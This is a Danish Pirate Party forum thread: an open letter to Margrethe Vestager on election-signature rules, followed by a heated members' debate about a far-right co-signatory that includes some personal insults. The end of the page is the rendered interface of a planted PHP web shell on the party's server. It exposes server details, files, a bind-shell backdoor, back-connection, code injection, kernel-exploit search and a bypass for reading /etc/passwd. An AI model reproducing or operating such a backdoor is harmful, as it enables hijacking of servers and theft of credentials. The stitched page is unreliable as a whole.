You are here

Pressemeddelelse: Åbent brev til Margrethe Vestager

20 posts / 0 new
Last post
Emil Kirkegaard
Emil Kirkegaard's picture
Pressemeddelelse: Åbent brev til Margrethe Vestager

Kære Margrethe,

Det er snart sommer, og det betyder at det er tid til at holde hvad du lovede. Du er citeret den 7. Marts 2013 på dr.dk for at sige "Det er min ambition at gøre det i løbet af forsommeren.".  Du har også tidligere, et år før det, udtalt dig om, at man bør kunne indsamle underskrifter på nettet. Det er meget nemt at tale, men det er handling der tæller. Det er på tide at indfrie dit løfte.

Piratpartiet har tidligere udsendt en længere pressemeddelelse hvor vi foreslog en række ændringer man kunne foretage. Vi opsummerer dem gerne igen.

1) Opret et centralt organ, fx under Indenrigsministeriet, som tager sig af underskriftindsamlinger på nationalt plan, dvs. til folketingsvalg og EU-parlamentsvalg. Det giver ikke mening at man skal have godkendt underskrifter i en masse forskellige kommuner fremfor et centralt sted. Underskrifter til kommunal og regionsvalg giver det derimod fint mening at indsamle og tælle lokalt på den måde som de lokale kommuner og regioner ønsker at gøre det.

2) Man bør kunne samle underskrifter på internettet. I forvejen foregår der al mulig anden borger-offentlig kommunikation på nettet fx borger.dk. Hvorfor ikke også samle underskrifter sådan? Teknologien er der, og infrastrukturen er der næsten.

3) Ved papirunderskrifter bør det ikke være et krav, at man skal have de sidste fire CPR-cifre. Dette er unødvendigt for identificeringen af borgeren og gør underskrivere mistænkelige da den information kan misbruges.

4) Nedsæt kravet til antal underskrifter. Danmark er muligvis det land i verden som kræver flest underskrifter for at få lov til at stille op til folketingsvalg ifht. befolkningesstørrelsen og kræver endda endnu flere til EU-parlamentsvalg. Det er en udemokratisk skamplet på det danske demokrati som stærkt favoriserer de etablerede partier. I Norge kræver man 5.000 og i Sverige kun 1.500. Man kan passende vælge et lignende tal for Danmark. Fx ved at nedsætte kravet fra 1/175 af de gyldige stemmer ved sidste valg til 1/2.000 eller 1/1.000, som svarer til henholdsvis ca. 1.750 og 3.500 underskrifter. Dette skal også gælde EU-parlamentsvalg, hvor man lige nu skal samle hele 70.000 underskrifter!

5) Overvej at fjerne spærregrænsen. Spærregrænsen er et udemokratisk redskab til at holde små partier ude af Folketinget. Andre lande, som fx Holland og Cypern, klarer sig fint uden at gøre brug af dem. En spærregrænse er en arbitrær grænse for hvor stor en gruppe mennesker man behøver for at kunne blive repræsenteret i sit eget parti. I Danmark har vi en forholdsvis lav spærregrænse på 2%, men hvis man fjernede den, så ville man undgå unødvendigt stemmespild og forøge den den del af befolkningen som føler sig repræsenteret af et parti i Folketinget.

6) Ændre loven således at en underskrift er gyldig i mere end 18 måneder. Det giver ikke mening at man skal have så kort tid til at samle så mange underskrifter.

Hvad er næste skridt? Du kunne jo indkalde til åbent samråd for interesserer personer og organisationer. Så møder vi gerne op og diskuterer vores forslag nærmere. Blandt underskriverne er de to største partier udenfor Folketinget.

Med venlig hilsen Piratpartiet Danmark

Medunderskrivere:

Frihedskæmperne

Folkets Frie Valg

EDIT: Danskernes Parti er siden blevet fjernet som medunderskriver på dette brev.

Emil Kirkegaard
Emil Kirkegaard's picture
Oprindelig skrevet med

Oprindelig skrevet med henblik på at poste på sociale medier, men nu poster jeg den her i stedet:

Siden at der åbenbart er en kampagne i gang mod os, så vil jeg lige skrive lidt om baggrunden for vores åbne brev. Initiativet blev taget af undertegnede. Baggrunden er, som også kan læses i brevet, at Margrethe Vestager tidligere har været ude og love at lave reglerne for Folketingsvalg om, således at det bliver nemmere at stille op til valg. Siden at der ikke var sket noget siden at de andre partier for et par måneder siden skrev en lign. opsang til hende, så mente jeg at det var på tide at gøre det igen. Derfor skrev jeg et brev mere.

Da jeg havde skrevet brevet tog jeg kontakt til andre partier udenfor Folketinget for at høre om de var interesserede i at være medunderskrivere. De fleste af dem takkede nej. Ikke fordi at de var generelt uenige, men fordi at de har gang i deres eget forsøg på at påvirke hende (som man kan læse på vores forum). De ville derfor ikke være med til at ‘angribe’ hende fra to vinkler fordi at de tror på deres eget forsøg. Jeg har til gengæld ikke så meget tiltro til at deres forsøg virker uden at der kommer opmærksomhed om emnet i medierne. Og derfor fortsatte jeg med brevet.

Nogle af de andre partier udenfor folketinget ville dog gerne være medunderskrivere. Som det kan ses, så drejer det sig om Folkets Frie Valg, Frihedskæmperne, og Danskernes Parti. De inviterede partier blev kun valgt ud fra deres seriøsitet (dvs. at de fx ikke er et parodiparti) og ikke pga. nogen særlig enighed med os ellers. Udover at Danskernes Parti skrev under på vores brev, så har Piratpartiet ikke haft noget med dem at gøre. Det samme gør sig gældende for Frihedskæmperne. Det er derfor noget af en strækning at kalde det et “samarbejde”. /Emil

konomi
Strategi fremover?

Jeg tænker på; Hvilket organ har vedtaget at disse organisationer skulle have muligheden for at være medunderskrivere?
 
Jeg har egentlig været glad og stolt over at være medlem af et parti som står for mere frihed for alle i samfundet. Men at man går ind og legitimerer organisationer som direkte prædiker fremmedhad synes jeg er meget overraskende og yderst foruroligende.
 
At man går ind og fører politik med Danskernes Parti, et parti hvis formand har udtalt at han: "Stadig har sit første jødedrab til gode", og at man dermed lader piratpartiet sætte i bås med fascister, og dermed er med til at promovere det modsatte af hvad jeg troede vi stod for; nemlig frihed til alle, ligegyldig enticitet, geografisk lokation, klasseskel eller alder.
Jeg vil meget gerne høre fra det organ der har taget denne beslutning hvorfor man har valgt at tilbyde disse organisationer at være medunderskrivere, om der har været en politisk process bag dette, eller om det er noget man har gjort uden videre overvejelse om hvad det kan betyde for partiet? Og hvis det sidste er tilfældet så vil jeg opfordre pågældende organ til at tænke noget mere over de politiske beslutninger de tager. At man på den måde kan gå ud og støtte noget der strider imod vores egen grundholdning er højst forbløffende.
Og hvis det faktisk ér en politisk beslutning, vil nogen så ikke redegøre for hvad argumenterne har været for dette?
Eventuelt sende mig et diskutionsreferat fra det pågældende møde?

Emil Kirkegaard
Emil Kirkegaard's picture
Hej konomi,

Hej konomi,

Som du kan læse ovenfor, så tog jeg initiativ til brevet. Som så meget andet i et græsrodsparti som Piratpartiet, så kommer initiativerne ofte fra enkelte medlemmer.

Arbejdet med brevet har foregået åbent. Du kan selv læse det her: https://www.piratpartiet.dk/node/918

Som du kan se, så blev mange partier inviteret til at skrive under, men det var kun mig (på vegne af Piratpartiet) som skrev brevet.

Jeg har egentlig været glad og stolt over at være medlem af et parti som står for mere frihed for alle i samfundet. Men at man går ind og legitimerer organisationer som direkte prædiker fremmedhad synes jeg er meget overraskende og yderst foruroligende.

Du lægger for meget i det. Al den der snak om legitimere dit og dat. Det er en dårlig måde at se tingene på.

Flere andre bestyrelsesmedlemmer har godkendt at de stod bag vores brev før det blev udsendt, så det var ikke noget one-man show i den forstand.

Geestkraker
Geestkraker's picture
Parodiparti?

Sådan ser jeg på det:

Enten må man vælge et "anything goes" eller også må man vælge med omhu. Hvis man kan beslutte at seriøse partier med fx racistiske holdninger må deltage, men ikke såkaldte parodipartier, så har man allerede sorteret.

Og jeg vil sige, at man må have noget kvalitativ risk-management med, som man er nødt til at tage højde for, når man sender pressemeddelelser. Enhedslisten begik en fejl i kvalitativ risk-management, da de havde Asmaa Abdol-Hamid fx, selvom pressen meget vel i store træk begik  "intellektuel uerlighed" i den sag.

Når jeg siger risk-management, så mener jeg naturligvis ikke matematisk forsikringsvidenskab aka aktuar. Man må bare indse at taktik er en legitim autoritet, som i at tage højde for, hvordan pressen agerer. Det er ikke det samme som at man nødvendigvis skal undgå smædekampagner fra pressen for enhver pris.

EDIT: Da jeg skrev denne kommentar, havde jeg ikke set denne tilføjelse:
"EDIT: Danskernes Parti er siden blevet fjernet som medunderskriver på dette brev."

Ole Husgaard
Emil Kirkegaard wrote:

Emil Kirkegaard wrote:
Flere andre bestyrelsesmedlemmer har godkendt at de stod bag vores brev før det blev udsendt, så det var ikke noget one-man show i den forstand.

Jeg vil lige gøre opmærksom på, at jeg IKKE har godkendt noget her. Emil oprettede en tråd, men informerede ikke hele bestyrelsen før han sendte ud.
 
At Emil har valgt at invitere Danskernes Parti til at være med på det åbne brev siger mere om Emils personlige holdning end Piratpartiets holdning. Efter min mening er det skidt, hvis Piratpartiet associeres med ekstreme holdninger.
 
En edit her i forummet efter at det åbne brev er sendt til pressen med Danskernes Parti som medunderskriver hjælper ikke meget.

Emil Kirkegaard
Emil Kirkegaard's picture
5/6 af bestyrelsen sagde ok.

5/6 af bestyrelsen sagde ok. Jeg er temmelig ligeglad med hvad du synes. :) Evige kværulanter som stort set aldrig bidrager, og vil bestemme alting selv. Zzz. No wonder at du kørte partiet i sænk.

Gina56
Jeg tager stærkt afstand fra

Jeg tager stærkt afstand fra Danskernes Parti som medunderskrivere
sammen med Piratpartiet.

Det er yderst skadeligt for vores parti.

Jeg synes, at Emil og de andre i bestyrelsen, som har har godkendt det
her, bør ekskluderes for partiskadelig virksomhed.
 

Geestkraker
Geestkraker's picture
En anarko-syndikalist her tager *ikke* afstand fra bestyrelsen

Jeg er lodret uenig med Gina56 i at nogen skal eksluderes for at have samarbejdet med andre partier om en underskrift for ét fucking punkt, uanset hvad disse partier måtte mene. Og ja, det er mig, Rasmus Sylvester.

Jeg fatter ikke, at folk på "venstrefløjen" ikke anvender samme standarder som Noam Chomsky eller Preben Wilhjelm - eller Voltaire for den sags skyld.

Jeg er ikke partimedlem, men jeg ville ikke ekskludere nogen for den handling eller andre udtalelser, ej heller vil jeg ekskludere nynazister fra min by, ej heller vil jeg ekskludere muslimer fra Danmark.

Jeg er dog uenig med Emil i at man må skelne mellem "seriøse" partier og såkaldte "parodipartier". Enten er det nok at de er officielle partier eller også må man sortere i hvem man samarbejder med.

Personligt mener jeg at man bedst bekæmper nynazisme med argumenter frem for eksklusion eller andre overstædige positioner.

Emil Kirkegaard
Emil Kirkegaard's picture
Det er vist kun bestyrelsen

Det er vist kun bestyrelsen som kan ekskludere folk. ;) Det er jo trods alt dem som er valgt til at... bestyre. Men partiets medlemmer har flere muligheder. De kan 1) vælge nogle andre til bestyrelsen næste gang, og 2) kræve et ekstraordinært landsmøde if. §6 stk. 3.

Jeg kan godt offentliggøre nogle data som viser, at det ikke rigtigt har været skadeligt for partiet i nogen betydelig grad.

Indtil videre har 1 medlem meldt sig ud. Samtidig har 2-3 andre meldt sig ind. Vores Facebook side mistede måske 15 likes, men de er kommet igen nu (eller nogle andre er). Det har givet lidt omtale på fascistgruppen Antifa's hjemmeside, på 180grader, på Danskernes Parti's side, og på Nationaldemokraten.

Ikke overraskende givet deres tidligere bedrifter, så har de mest ekstreme reaktioner været hos Antifa, som jo spammede vores Facebookside med nazipåstande. De havde endda hentet hjælp hos deres svenske kollegaer.

Emil Kirkegaard
Emil Kirkegaard's picture
At bekæmpe nazister (nye

At bekæmpe nazister (nye eller 'gamle') med love lader ikke til at virke i de lande hvor man har prøvet på den slags i årtier. Prøv at læse fx Wikipedia. https://en.wikipedia.org/wiki/Neo-Nazism

Geestkraker
Geestkraker's picture
Det er ikke nogen nyhed

Det er ikke nogen nyhed, men tilsyneladende ikke alle, der har fattet det.

egnat
Jeg synes det er et fint brev

Jeg synes det er et fint brev til Margrethe Vestager. Nogle af ideer kræver nok så store lovændringer, at de ikke er realistiske, men det skal ikke afholde os fra at have det som mål.
Mht. underskifterne så ligner det politisk uerfarenhed at tage kontroversielle partier med: Vi skal have omtale på grund af det åbne brev - ikke have fokus flyttet til medunderskrivernes politik.
 
Jeg kan også sagtens forstå Emils forklaring om, at "samarbejdet" med medunderskriverne alene er i form af underskriften, men det ved læseren ikke. Antifa https://projektantifa.dk/nyheder/article/nazisympatier-i-piratpartiet fatter det f.eks. ikke.
Derfor, kære bestyrelse: Hvis I tror, at jeres budskab kan misforståes/fordrejes, så prøv at imøde gå dette før det sendes ud. Jeg er sikker på, at flere af jer godt vidste, at Danskernes Parti i den sammenhæng var kontroversielle.
Til gengæld ville det virke stærkt, hvis underskriverne havde været Danskernes Parti, Maoistisk/Stalinistisk Folkeparti, Hizb ut-Tahrir samt et af partierne i folketinget (F.eks. Liberal Alliance, som jo heller ikke er store) eller tilsvarende - altså nogle som kan balancere hinanden ud.
Med det ville underskrifterne også have trukket opmærksomhed, men på en måde, hvor man som læser ville blive overrasket over, hvad hulen disse meget forskellige partier dog kunne være enige om - netop fordi de opvejer hinanden.
Så herfra skal lyde en ros for godt arbejde (brevet), og en opfording til at sørge for balance, hvis man laver samarbejde med andre uden for partiet.
 

Emil Kirkegaard
Emil Kirkegaard's picture
Antifa er idioter som ikke

Antifa er idioter som ikke evner eller vil forstå tingene. Dem kan man ikke gøre noget ved.

konomi
Ordentlig debatstil

Emil jeg kunne godttænke mig at du kom med egnetlige argumenter. Du skriver
 

Emil Kirkegaard wrote:
Du lægger for meget i det. Al den der snak om legitimere dit og dat. Det er en dårlig måde at se tingene på.

Ok. Det er en holdning. Men du vælger slet ikke at gå ind og komme med ét etneste argument. Du siger at det er "den forkerte måde at se det på", og det er dét. 
Og er der en "rigtig" og en "forkert" måde at se det på? Går vi netop ikke ind for frihed? Og altså også ret til at tænke som man vil?
 
Derudover skriver du:

Emil Kirkegaard wrote:
5/6 af bestyrelsen sagde ok. Jeg er temmelig ligeglad med hvad du synes. :) Evige kværulanter som stort set aldrig bidrager, og vil bestemme alting selv. Zzz. No wonder at du kørte partiet i sænk.

Jeg har set dig gøre det flere gange før. Du går efter manden og ikke efter bolden.
Fordi en person går ind og kommer med argumenter der undergraver din påstand begynder du straks at komme med beskyldninger mod denne person. Hvis du ikke kan forsvare dine påstande i din debat, så burde du måske ikke fremsætte dem i første omgang.
 
Og bare for en god ordens skyld:

Emil Kirkegaard wrote:
Antifa er idioter som ikke vner eller vil forstå tingene. Dem kan man ikke gøre noget ved.

Igen; du beskylder nogen der er uenige med dig for ting som du vælger ikke at underbygge med argumenter. Vil du ikke gøre det?

Emil Kirkegaard
Emil Kirkegaard's picture
Jeg vil lige pointere overfor

Jeg vil lige pointere overfor læseren af dette indlæg, at de citater som findes af mig der kommer fra forskellige indlæg. Det gør konomi dog ikke opmærksom på, og derfor forekommer de usammenhængende... hvilket de jo også er. :)

konomi
Det er korrekt at de er fra

Det er korrekt at de er fra forskellige indlæg. (.
Jeg var ikke opmærksom på det kunne have en betydning at de var fra forskellige indlæg, så tak for at påpege det så mit indlæg bliver mere klart, og hvis du mener at det var uretfærdigt at jeg ikke gjorde opmærksom på det, mere fair. (:

Hinton
Emil Kirkegaard wrote:

Emil Kirkegaard wrote:
5/6 af bestyrelsen sagde ok. 

 
Har du fået den forhåndsgodkendelse? På den underskrift som du har sendt ud sammen med Danskenes Parti?
 

hypesystem
Jeg vil bare lige registrere

Jeg vil bare lige registrere at jeg er fuldt ud enig med konomi. Det er simpelthen ikke gavnligt for debatten at komme med personangreb - det hjælper os på ingen måde til at komme frem til en evt. konklusion på hvad der var godt/dårligt.

darkshark
bare lige registrere x 2

Registrere mig hermed enig med konomi og hypesystem. Det er simpelthen for ukonstruktivt med personangreb i stedet for argumenter.
Desværre lader det til at være et gentagende mønster, se f.eks. tråden "Om god debattone" (https://www.piratpartiet.dk/node/897).

Det kan simpelthen ikke være rigtigt med konstante infights og personfnidder i bestyrelsen.
Desuden syntes jeg at Hinton stiller et relevant spørgsmål:

Har du fået den forhåndsgodkendelse? På den underskrift som du har sendt ud sammen med Danskenes Parti?

 

 

GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.15 (CentOS). PHP/5.3.3
Kernel: Linux pet.piratpartiet.dk 2.6.32-504.23.4.el6.x86_64 #1 SMP Tue Jun 9 20:57:37 UTC 2015
x86_64
Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 827.91 GB of 912.5 GB (90.73%)Server IP: 95.211.216.69 - Your IP: 207.241.229.224

/var/www/html/piratpartietdk/   drwxr-xr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (20 files and 9 folders):

Name [asc] Size Modify Owner/Group Perms Action
. LINK 26.09.2015 01:02:14 0/0 drwxr-xr-x [info] 
.. LINK 25.09.2015 23:34:19 0/0 drwxr-xr-x [info] 
[profiles] DIR 25.09.2015 23:37:34 0/0 drwxr-xr-x [info] 
[includes] DIR 25.09.2015 23:35:10 0/0 drwxr-xr-x [info] 
[modules] DIR 25.09.2015 23:37:08 0/0 drwxr-xr-x [info] 
[themes] DIR 25.09.2015 23:56:20 0/0 drwxr-xr-x [info] 
[misc] DIR 25.09.2015 23:35:24 0/0 drwxr-xr-x [info] 
[public_html] DIR 25.09.2015 23:37:35 0/0 drwxr-xr-x [info] 
[sites] DIR 25.09.2015 23:50:09 0/0 drwxr-xr-x [info] 
[partier_paa_sociale_medier] DIR 25.09.2015 23:37:32 0/0 drwxr-xr-x [info] 
[scripts] DIR 25.09.2015 23:37:36 0/0 drwxr-xr-x [info] 
 web.config 2 KB 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 25.09.2015 23:37:35 0/0 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 1.45 KB 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 syslog 696 B 25.09.2015 23:56:12 0/0 -rw-r--r-- [info] [change] [download] 
 CHANGELOG.txt 73.16 KB 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 README.txt 5.25 KB 25.09.2015 23:37:35 0/0 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.4 KB 25.09.2015 23:34:53 0/0 -rw-r--r-- [info] [change] [download] 
 update.php 18.96 KB 25.09.2015 23:56:23 0/0 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.05 KB 26.09.2015 01:02:14 0/0 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 8 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 25.09.2015 23:35:10 0/0 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 25.09.2015 23:35:10 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0112 ]:.